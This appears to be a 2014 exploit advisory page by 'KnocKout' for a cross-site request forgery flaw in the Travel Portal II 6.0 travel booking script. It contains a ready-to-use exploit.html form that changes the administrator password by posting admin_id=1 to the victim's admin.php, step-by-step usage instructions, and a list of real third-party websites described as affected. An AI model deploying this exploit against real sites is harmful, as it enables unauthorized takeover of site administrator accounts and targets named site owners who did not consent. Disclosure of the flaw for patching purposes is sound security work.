Travel Portal II 6.0 Cross Site Request Forgery

2014.09.13

Credit: KnocKout

Risk: Low

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-352

Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit
~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact(onlymail) : knockout@e-mail.com.tr
[~] HomePage : http://Cyber-Warrior.Org - http://h4x0resec.blogspot.com - http://www.cyber-warrior.org/100379
[~] Greetz: DaiMon,furty,BackDoor,EthicalHacker,BARCOD3,SZE&#169;,VolqaN,Septemb0x..  Unuttuklarmz affola..
############################################################
                 Turkey Security Group
                 'h4x0re SECURITY'                        
###########################################################
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
|~Web App. : Travel Portal II (6.0)
|~Affected Version : II 6.0 and predecessors.. / all version
|~Official Software Web: http://www.tourismscripts.com/scripts/scripts/hotel-cars-flights-villas-flats-custom-potal-script.html
|~PRICE : 349 Euro
|~RISK : High
|~Google Keyword/Dorks : N/A
|~Tested On : Kali Linux \ Mozilla Firefox 
####################INFO################################

admin password can be changed easily..

####################Usage Exploit########################
Exploitation
Edit to exploit.html target website..
Open exploit.html your browser..
Determine your new password.
GO TO ADMIN PANEL..
####################Example affected sites & Tested on#####

http://travelportal.tourismscripts.com/    ( Official Demo )
http://almarjanmakkah.com
http://www.istanbulairportal.com
 
==============================================================================00
Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploit ; exploit.html
==============================================================================0

<h3>Travel Portal II (6.0) - CSRF Admin Password Change PoC Exploited by KnocKout</h3>
<table>
<tr>
<form method="post" action="http://[VICTIM]/admin/admin.php">
<input type="hidden" name="admin_id" value="1">
<td align=right>Username:</td><td align=left><input name="admin_name" size="40" maxlength="40" value="admin"><td>
</tr>
<tr>
<td align=right>New Password:</td><td align=left><input name="password" size="40" maxlength="40" ><td>
</tr>
<tr>
<td></td><td><input type="submit" name="submit" value="Update Password"></td>
</form>
</tr>
 
</table>

=====================================

                .__        _____        _______                 
                |  |__    /  |  |___  __\   _  \_______   ____  
                |  |  \  /   |  |\  \/  /  /_\  \_  __ \_/ __ \ 
                |   Y  \/    ^   />    <\  \_/   \  | \/\  ___/ 
                |___|  /\____   |/__/\_ \\_____  /__|    \___  >
                     \/      |__|      \/      \/            \/ 
                         _____________________________  
                        /   _____/\_   _____/\_   ___ \ 
                        \_____  \  |    __)_ /    \  \/ 
                        /        \ |        \\     \____
                       /_______  //_______  / \______  /
                               \/         \/         \/ 

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

Travel Portal II 6.0 Cross Site Request Forgery

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.